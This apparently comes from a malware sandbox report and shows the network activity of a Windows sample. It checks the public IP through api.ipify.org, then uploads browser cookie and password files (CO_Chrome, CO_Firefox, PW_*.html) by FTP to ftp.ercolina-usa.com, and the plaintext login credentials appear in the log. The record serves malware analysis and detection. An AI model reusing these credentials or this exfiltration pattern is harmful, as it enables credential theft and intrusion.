Jan 11, 2025 08:34:18.247148037 CET	49748	49190	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:18.247210026 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:18.252064943 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:18.709141970 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:18.709427118 CET	49748	49190	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:18.709541082 CET	49748	49190	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:18.714322090 CET	49190	49748	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:18.715209007 CET	49190	49748	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:18.715270042 CET	49748	49190	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:18.751765013 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:18.857029915 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:18.879103899 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:18.884284973 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:19.025227070 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:19.025774002 CET	49749	43815	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:19.030656099 CET	43815	49749	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:19.034284115 CET	49749	43815	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:19.034404993 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:19.039242029 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:19.495796919 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:19.496077061 CET	49749	43815	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:19.496078014 CET	49749	43815	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:19.501017094 CET	43815	49749	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:19.501055002 CET	43815	49749	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:19.501066923 CET	43815	49749	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:19.501378059 CET	43815	49749	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:19.501435041 CET	49749	43815	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:19.548777103 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:19.643299103 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:19.643683910 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:19.648622990 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:19.790035009 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:19.790414095 CET	49750	32215	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:19.795389891 CET	32215	49750	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:19.795460939 CET	49750	32215	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:19.795526028 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:19.800327063 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:20.258364916 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:20.266056061 CET	49750	32215	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:20.271122932 CET	32215	49750	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:20.271182060 CET	49750	32215	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:20.298604012 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:20.412659883 CET	21	49747	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:20.454828978 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:22.950107098 CET	49751	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:22.950186014 CET	443	49751	104.26.13.205	192.168.2.4
Jan 11, 2025 08:34:22.954231024 CET	49751	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:23.034586906 CET	49751	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:23.034619093 CET	443	49751	104.26.13.205	192.168.2.4
Jan 11, 2025 08:34:23.493911982 CET	443	49751	104.26.13.205	192.168.2.4
Jan 11, 2025 08:34:23.493982077 CET	49751	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:23.499002934 CET	49751	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:23.499015093 CET	443	49751	104.26.13.205	192.168.2.4
Jan 11, 2025 08:34:23.499514103 CET	443	49751	104.26.13.205	192.168.2.4
Jan 11, 2025 08:34:23.545309067 CET	49751	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:23.587342024 CET	443	49751	104.26.13.205	192.168.2.4
Jan 11, 2025 08:34:23.653721094 CET	443	49751	104.26.13.205	192.168.2.4
Jan 11, 2025 08:34:23.653824091 CET	443	49751	104.26.13.205	192.168.2.4
Jan 11, 2025 08:34:23.654030085 CET	49751	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:23.658977032 CET	49751	443	192.168.2.4	104.26.13.205
Jan 11, 2025 08:34:24.167604923 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:24.172482014 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:24.172549963 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:24.358439922 CET	49747	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:24.729182005 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:24.730343103 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:24.735176086 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:24.879705906 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:24.879857063 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:24.885241032 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:25.136733055 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:25.136862040 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:25.141685963 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:25.286025047 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:25.286140919 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:25.290977001 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:25.435256958 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:25.435436010 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:25.440283060 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:25.584865093 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:25.585024118 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:25.589876890 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:25.734584093 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:25.735038996 CET	49753	45445	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:25.739980936 CET	45445	49753	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:25.740138054 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:25.740166903 CET	49753	45445	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:25.744998932 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:26.209619999 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:26.210410118 CET	49753	45445	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:26.210410118 CET	49753	45445	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:26.215388060 CET	45445	49753	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:26.215651035 CET	45445	49753	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:26.217704058 CET	49753	45445	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:26.251666069 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:26.360286951 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:26.382117033 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:26.387064934 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:26.531615019 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:26.532316923 CET	49754	42796	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:26.537197113 CET	42796	49754	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:26.537722111 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:26.537729979 CET	49754	42796	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:26.542505980 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:27.002496958 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:27.002860069 CET	49754	42796	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:27.002860069 CET	49754	42796	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:27.007705927 CET	42796	49754	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:27.007759094 CET	42796	49754	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:27.007767916 CET	42796	49754	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:27.008028030 CET	42796	49754	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:27.008095980 CET	49754	42796	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:27.048701048 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:27.152502060 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:27.153107882 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:27.157948971 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:27.302397013 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:27.302784920 CET	49755	49582	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:27.307641983 CET	49582	49755	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:27.307703018 CET	49755	49582	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:27.307771921 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:27.312608004 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:27.772250891 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:27.772536039 CET	49755	49582	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:27.777546883 CET	49582	49755	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:27.777698994 CET	49755	49582	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:27.814271927 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:27.922419071 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 08:34:27.970412970 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:34:36.138953924 CET	54389	53	192.168.2.4	162.159.36.2
Jan 11, 2025 08:34:36.144156933 CET	53	54389	162.159.36.2	192.168.2.4
Jan 11, 2025 08:34:36.144270897 CET	54389	53	192.168.2.4	162.159.36.2
Jan 11, 2025 08:34:36.149328947 CET	53	54389	162.159.36.2	192.168.2.4
Jan 11, 2025 08:34:36.590698004 CET	54389	53	192.168.2.4	162.159.36.2
Jan 11, 2025 08:34:36.596427917 CET	53	54389	162.159.36.2	192.168.2.4
Jan 11, 2025 08:34:36.596486092 CET	54389	53	192.168.2.4	162.159.36.2
Jan 11, 2025 08:35:33.028836966 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:35:33.033878088 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:35:33.176716089 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:35:33.177316904 CET	54658	31555	192.168.2.4	192.254.225.136
Jan 11, 2025 08:35:33.182154894 CET	31555	54658	192.254.225.136	192.168.2.4
Jan 11, 2025 08:35:33.182224035 CET	54658	31555	192.168.2.4	192.254.225.136
Jan 11, 2025 08:35:33.182332039 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:35:33.187093019 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:35:33.820887089 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:35:33.821090937 CET	54658	31555	192.168.2.4	192.254.225.136
Jan 11, 2025 08:35:33.821134090 CET	54658	31555	192.168.2.4	192.254.225.136
Jan 11, 2025 08:35:33.825984001 CET	31555	54658	192.254.225.136	192.168.2.4
Jan 11, 2025 08:35:33.826271057 CET	31555	54658	192.254.225.136	192.168.2.4
Jan 11, 2025 08:35:33.826452017 CET	54658	31555	192.168.2.4	192.254.225.136
Jan 11, 2025 08:35:33.864468098 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 08:35:33.969130039 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 08:35:34.017190933 CET	49735	21	192.168.2.4	192.254.225.136

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 08:33:58.580775976 CET	63762	53	192.168.2.4	1.1.1.1
Jan 11, 2025 08:33:58.628747940 CET	53	63762	1.1.1.1	192.168.2.4
Jan 11, 2025 08:34:00.288131952 CET	56224	53	192.168.2.4	1.1.1.1
Jan 11, 2025 08:34:00.709427118 CET	53	56224	1.1.1.1	192.168.2.4
Jan 11, 2025 08:34:36.138415098 CET	53	53558	162.159.36.2	192.168.2.4
Jan 11, 2025 08:34:36.607333899 CET	53	51413	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 08:33:58.580775976 CET	192.168.2.4	1.1.1.1	0xb791	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:34:00.288131952 CET	192.168.2.4	1.1.1.1	0xe4d	Standard query (0)	ftp.ercolina-usa.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 08:33:58.628747940 CET	1.1.1.1	192.168.2.4	0xb791	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:33:58.628747940 CET	1.1.1.1	192.168.2.4	0xb791	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:33:58.628747940 CET	1.1.1.1	192.168.2.4	0xb791	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:34:00.709427118 CET	1.1.1.1	192.168.2.4	0xe4d	No error (0)	ftp.ercolina-usa.com	ercolina-usa.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 08:34:00.709427118 CET	1.1.1.1	192.168.2.4	0xe4d	No error (0)	ercolina-usa.com		192.254.225.136	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	104.26.13.205	443	7628	C:\Users\user\Desktop\dhPWt112uC.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:33:59 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-11 07:33:59 UTC	424	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:33:59 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 900338c5efbbc481-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1473&rtt_var=569&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1893644&cwnd=236&unsent_bytes=0&cid=8f3e3ea279f75d1e&ts=194&x=0"
2025-01-11 07:33:59 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49746	104.26.13.205	443	2260	C:\Users\user\AppData\Roaming\newapp\newapp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:34:15 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-11 07:34:16 UTC	424	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:34:16 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 9003392df85518c4-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1465&min_rtt=1463&rtt_var=554&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1965006&cwnd=169&unsent_bytes=0&cid=c8ad1726a614cada&ts=195&x=0"
2025-01-11 07:34:16 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49751	104.26.13.205	443	5324	C:\Users\user\AppData\Roaming\newapp\newapp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:34:23 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-11 07:34:23 UTC	424	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:34:23 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 9003395d7c9041f8-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1596&rtt_var=605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1799137&cwnd=223&unsent_bytes=0&cid=2a6923e552ab1b3e&ts=168&x=0"
2025-01-11 07:34:23 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 11, 2025 08:34:01.299359083 CET	21	49735	192.254.225.136	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 02:34. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 02:34. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 02:34. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Jan 11, 2025 08:34:01.301261902 CET	49735	21	192.168.2.4	192.254.225.136	USER ben@ercolina-usa.com
Jan 11, 2025 08:34:01.449145079 CET	21	49735	192.254.225.136	192.168.2.4	331 User ben@ercolina-usa.com OK. Password required
Jan 11, 2025 08:34:01.452816963 CET	49735	21	192.168.2.4	192.254.225.136	PASS nXe0M~WkW&nJ
Jan 11, 2025 08:34:01.719630003 CET	21	49735	192.254.225.136	192.168.2.4	230 OK. Current restricted directory is /
Jan 11, 2025 08:34:01.872483015 CET	21	49735	192.254.225.136	192.168.2.4	504 Unknown command
Jan 11, 2025 08:34:01.873909950 CET	49735	21	192.168.2.4	192.254.225.136	PWD
Jan 11, 2025 08:34:02.022032976 CET	21	49735	192.254.225.136	192.168.2.4	257 "/" is your current location
Jan 11, 2025 08:34:02.022197962 CET	49735	21	192.168.2.4	192.254.225.136	TYPE I
Jan 11, 2025 08:34:02.170084000 CET	21	49735	192.254.225.136	192.168.2.4	200 TYPE is now 8-bit binary
Jan 11, 2025 08:34:02.170425892 CET	49735	21	192.168.2.4	192.254.225.136	PASV
Jan 11, 2025 08:34:02.318458080 CET	21	49735	192.254.225.136	192.168.2.4	227 Entering Passive Mode (192,254,225,136,171,171)
Jan 11, 2025 08:34:02.324115992 CET	49735	21	192.168.2.4	192.254.225.136	STOR CO_Chrome_Default.txt_user-910646_2025_01_11_03_03_59.txt
Jan 11, 2025 08:34:02.792187929 CET	21	49735	192.254.225.136	192.168.2.4	150 Accepted data connection
Jan 11, 2025 08:34:02.940927029 CET	21	49735	192.254.225.136	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.149 seconds (measured here), 22.02 Kbytes per second
Jan 11, 2025 08:34:02.941337109 CET	49735	21	192.168.2.4	192.254.225.136	PASV
Jan 11, 2025 08:34:03.089545965 CET	21	49735	192.254.225.136	192.168.2.4	227 Entering Passive Mode (192,254,225,136,154,227)
Jan 11, 2025 08:34:03.095156908 CET	49735	21	192.168.2.4	192.254.225.136	STOR CO_Firefox_fqs92o4p.default-release.txt_user-910646_2025_01_11_06_03_34.txt
Jan 11, 2025 08:34:03.566484928 CET	21	49735	192.254.225.136	192.168.2.4	150 Accepted data connection
Jan 11, 2025 08:34:03.715665102 CET	21	49735	192.254.225.136	192.168.2.4	226 File successfully transferred
Jan 11, 2025 08:34:17.249368906 CET	21	49747	192.254.225.136	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 02:34. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 02:34. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 02:34. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Jan 11, 2025 08:34:17.249723911 CET	49747	21	192.168.2.4	192.254.225.136	USER ben@ercolina-usa.com
Jan 11, 2025 08:34:17.395706892 CET	21	49747	192.254.225.136	192.168.2.4	331 User ben@ercolina-usa.com OK. Password required
Jan 11, 2025 08:34:17.395988941 CET	49747	21	192.168.2.4	192.254.225.136	PASS nXe0M~WkW&nJ
Jan 11, 2025 08:34:17.636948109 CET	21	49747	192.254.225.136	192.168.2.4	230 OK. Current restricted directory is /
Jan 11, 2025 08:34:17.795767069 CET	21	49747	192.254.225.136	192.168.2.4	504 Unknown command
Jan 11, 2025 08:34:17.797269106 CET	49747	21	192.168.2.4	192.254.225.136	PWD
Jan 11, 2025 08:34:17.945301056 CET	21	49747	192.254.225.136	192.168.2.4	257 "/" is your current location
Jan 11, 2025 08:34:17.946938992 CET	49747	21	192.168.2.4	192.254.225.136	TYPE I
Jan 11, 2025 08:34:18.094849110 CET	21	49747	192.254.225.136	192.168.2.4	200 TYPE is now 8-bit binary
Jan 11, 2025 08:34:18.094991922 CET	49747	21	192.168.2.4	192.254.225.136	PASV
Jan 11, 2025 08:34:18.241627932 CET	21	49747	192.254.225.136	192.168.2.4	227 Entering Passive Mode (192,254,225,136,192,38)
Jan 11, 2025 08:34:18.247210026 CET	49747	21	192.168.2.4	192.254.225.136	STOR PW_user-910646_2025_01_11_02_34_15.html
Jan 11, 2025 08:34:18.709141970 CET	21	49747	192.254.225.136	192.168.2.4	150 Accepted data connection
Jan 11, 2025 08:34:18.857029915 CET	21	49747	192.254.225.136	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.148 seconds (measured here), 2.29 Kbytes per second
Jan 11, 2025 08:34:18.879103899 CET	49747	21	192.168.2.4	192.254.225.136	PASV
Jan 11, 2025 08:34:19.025227070 CET	21	49747	192.254.225.136	192.168.2.4	227 Entering Passive Mode (192,254,225,136,171,39)
Jan 11, 2025 08:34:19.034404993 CET	49747	21	192.168.2.4	192.254.225.136	STOR CO_Chrome_Default.txt_user-910646_2025_01_11_05_23_58.txt
Jan 11, 2025 08:34:19.495796919 CET	21	49747	192.254.225.136	192.168.2.4	150 Accepted data connection
Jan 11, 2025 08:34:19.643299103 CET	21	49747	192.254.225.136	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.147 seconds (measured here), 22.25 Kbytes per second
Jan 11, 2025 08:34:19.643683910 CET	49747	21	192.168.2.4	192.254.225.136	PASV
Jan 11, 2025 08:34:19.790035009 CET	21	49747	192.254.225.136	192.168.2.4	227 Entering Passive Mode (192,254,225,136,125,215)
Jan 11, 2025 08:34:19.795526028 CET	49747	21	192.168.2.4	192.254.225.136	STOR CO_Firefox_fqs92o4p.default-release.txt_user-910646_2025_01_11_06_33_41.txt
Jan 11, 2025 08:34:20.258364916 CET	21	49747	192.254.225.136	192.168.2.4	150 Accepted data connection
Jan 11, 2025 08:34:20.412659883 CET	21	49747	192.254.225.136	192.168.2.4	226 File successfully transferred
Jan 11, 2025 08:34:24.729182005 CET	21	49752	192.254.225.136	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 02:34. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 02:34. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 02:34. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Jan 11, 2025 08:34:24.730343103 CET	49752	21	192.168.2.4	192.254.225.136	USER ben@ercolina-usa.com
Jan 11, 2025 08:34:24.879705906 CET	21	49752	192.254.225.136	192.168.2.4	331 User ben@ercolina-usa.com OK. Password required
Jan 11, 2025 08:34:24.879857063 CET	49752	21	192.168.2.4	192.254.225.136	PASS nXe0M~WkW&nJ
Jan 11, 2025 08:34:25.136733055 CET	21	49752	192.254.225.136	192.168.2.4	230 OK. Current restricted directory is /
Jan 11, 2025 08:34:25.286025047 CET	21	49752	192.254.225.136	192.168.2.4	504 Unknown command
Jan 11, 2025 08:34:25.286140919 CET	49752	21	192.168.2.4	192.254.225.136	PWD
Jan 11, 2025 08:34:25.435256958 CET	21	49752	192.254.225.136	192.168.2.4	257 "/" is your current location
Jan 11, 2025 08:34:25.435436010 CET	49752	21	192.168.2.4	192.254.225.136	TYPE I
Jan 11, 2025 08:34:25.584865093 CET	21	49752	192.254.225.136	192.168.2.4	200 TYPE is now 8-bit binary
Jan 11, 2025 08:34:25.585024118 CET	49752	21	192.168.2.4	192.254.225.136	PASV
Jan 11, 2025 08:34:25.734584093 CET	21	49752	192.254.225.136	192.168.2.4	227 Entering Passive Mode (192,254,225,136,177,133)
Jan 11, 2025 08:34:25.740138054 CET	49752	21	192.168.2.4	192.254.225.136	STOR PW_user-910646_2025_01_11_02_34_23.html
Jan 11, 2025 08:34:26.209619999 CET	21	49752	192.254.225.136	192.168.2.4	150 Accepted data connection
Jan 11, 2025 08:34:26.360286951 CET	21	49752	192.254.225.136	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.151 seconds (measured here), 2.25 Kbytes per second
Jan 11, 2025 08:34:26.382117033 CET	49752	21	192.168.2.4	192.254.225.136	PASV
Jan 11, 2025 08:34:26.531615019 CET	21	49752	192.254.225.136	192.168.2.4	227 Entering Passive Mode (192,254,225,136,167,44)
Jan 11, 2025 08:34:26.537722111 CET	49752	21	192.168.2.4	192.254.225.136	STOR CO_Chrome_Default.txt_user-910646_2025_01_11_05_34_05.txt
Jan 11, 2025 08:34:27.002496958 CET	21	49752	192.254.225.136	192.168.2.4	150 Accepted data connection
Jan 11, 2025 08:34:27.152502060 CET	21	49752	192.254.225.136	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.150 seconds (measured here), 21.84 Kbytes per second
Jan 11, 2025 08:34:27.153107882 CET	49752	21	192.168.2.4	192.254.225.136	PASV
Jan 11, 2025 08:34:27.302397013 CET	21	49752	192.254.225.136	192.168.2.4	227 Entering Passive Mode (192,254,225,136,193,174)
Jan 11, 2025 08:34:27.307771921 CET	49752	21	192.168.2.4	192.254.225.136	STOR CO_Firefox_fqs92o4p.default-release.txt_user-910646_2025_01_11_06_33_51.txt
Jan 11, 2025 08:34:27.772250891 CET	21	49752	192.254.225.136	192.168.2.4	150 Accepted data connection
Jan 11, 2025 08:34:27.922419071 CET	21	49752	192.254.225.136	192.168.2.4	226 File successfully transferred
Jan 11, 2025 08:35:33.028836966 CET	49735	21	192.168.2.4	192.254.225.136	PASV
